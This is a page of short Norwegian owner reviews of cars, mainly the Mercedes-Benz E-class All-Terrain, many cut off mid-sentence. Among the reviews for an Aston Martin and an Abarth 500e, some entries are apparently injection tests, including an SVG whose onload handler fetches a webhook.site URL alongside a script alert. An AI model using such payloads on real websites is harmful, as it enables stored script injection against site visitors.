Vurdert av Duke
Mercedes-Benz E-klasse All-Terrain (2019)
Min bil kjørt 86000 km. Inneholder mye mer eletronikk enn jeg holder rede på. Foretok en 5 års garantitest hos NAF. Påvist feil med beskjed om rep hos Mercedes. De rettet en feil ved eksosanlegget
Mercedes-Benz E-klasse All-Terrain (2019)
Fantastisk bil, driftsikker, kjøreglede, stor plass og god service fra forhandler
Mercedes-Benz E-klasse All-Terrain (2019)
Mercedes-Benz E-klasse All-Terrain (2019)
Flott all-round familiebil som trives like godt på motorvei, i byen og på dårlige hytteveier
Mercedes-Benz E-klasse All-Terrain (2018)
Nydelig stasjonsvogn, en ekte norgesbil! Det er en E400d all-terrain jeg har. Masse krefter!
Mercedes-Benz E-klasse All-Terrain (2018)
Suveren - autostyring, eksepsjonell komfort og langtursbil. Euro 6 med ureafilter som tar vekk nox bør gi rabatt i bomringene!
Mercedes-Benz E-klasse All-Terrain (2018)
Dette er den beste bilen jeg har hatt. Ser at jeg har hatt 11 biler og ingen av samme merke to ganger. Jeg har altså ikke vært en pålitelig kunde, men spørs om ikke det endrer seg nå, litt avheng
Mercedes-Benz E-klasse All-Terrain (2018)
Det er totaliteten som gjør denne bilen så bra!
Mercedes-Benz E-klasse All-Terrain (2017)
Ingen feil på a
Mercedes-Benz E-klasse All-Terrain (2017)
Totalt sett godt fornøyd med bil, men ikke med service og oppfølging fra MB. Dette blir vår siste MB.
Mercedes-Benz E-klasse All-Terrain (2017)
0,5 på mila på lange motorveiturer med 120 til 150 km i timen. Det er fantastisk. Bare flyter av gårde. Ikke heeeelt fornøyd med hvitt skinn, men ikke hatt problemer ila 115000 km. Plass til alt o
Mercedes-Benz E-klasse All-Terrain (2017)
Vært utrolig fornøyd siden første dag, imponerende hvor moderne bilen fremstår innvendig selv om den nærmer seg 5 år. Behagelig kjøreglede og gode sikkerhetssystemer som gjør bilen trygg.
Mercedes-Benz E-klasse All-Terrain (2017)
Jeg kjører veldig mye, ca 55-60.000 km/år, så bilen har nå gått mer enn 120.000 km, Ingen feil eller mangler på bilen hittil. Utrolig komfortabel og en helt nydelig bil.
Mercedes-Benz E-klasse All-Terrain (2017)
Bilen er vannvittig lekker i hvit, med nydelige linjker fra siden og forfra. Flott interiør med ambient og widescreen. Det er en headturner, og den har ALT jeg trenger. 4WD, masse plass, nydelig komf
Mercedes-Benz E-klasse All-Terrain (2017)
Fantastisk bil. Er utrolig godt fornøyd. Kjører veldig mye i jobb som selger.
Renault 5 E-Tech (2025)
Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te
Citroën e-C4 (2025)
Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve
Aston Martin DB9 GT (2017)
alert("total")
Aston Martin DB9 GT (2017)
totalvurderingtest
Abarth 500e (2024)
Abarth 500e (2024)
Abarth 500e (2024)
xxxfooo4
Abarth 500e (2024)
<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>
Volvo EX40 (2026)
Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass
Ford Explorer EV (2025)
Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.
Ford Kuga (2021)
Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring
Hongqi E-HS9 (2022)
Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!
Mercedes-Benz EQC (2022)
Topp komfort og driftsikker.
Polestar 2 (2022)
God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h
Mercedes-Benz GLE (2020)
Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km